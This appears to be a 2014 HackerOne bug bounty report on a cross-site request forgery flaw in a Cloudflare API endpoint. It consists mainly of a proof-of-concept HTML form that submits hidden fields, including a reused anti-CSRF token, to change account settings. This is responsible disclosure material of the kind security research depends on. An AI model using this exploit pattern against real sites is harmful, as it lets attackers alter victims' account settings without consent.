Cloudflare: System Status Update CSRF

2014-04-22T04:57:24
ID H1:8943
Type hackerone
Reporter chandrakant
Modified 2014-09-10T10:09:43

Description

<html> <!-- CSRF PoC By CK--> <body> <form action="https://www.cloudflare.com/api/v2/comm/set"> <input type="hidden" name="k" value="comm_ea" /> <input type="hidden" name="v" value="1" /> <input type="hidden" name="atok" value="1398171312-878f7ba09e5dac2e4e23" /> <input type="submit" value="Submit request" /> </form> </body> </html>

The atok token can be any oold used token it works very well .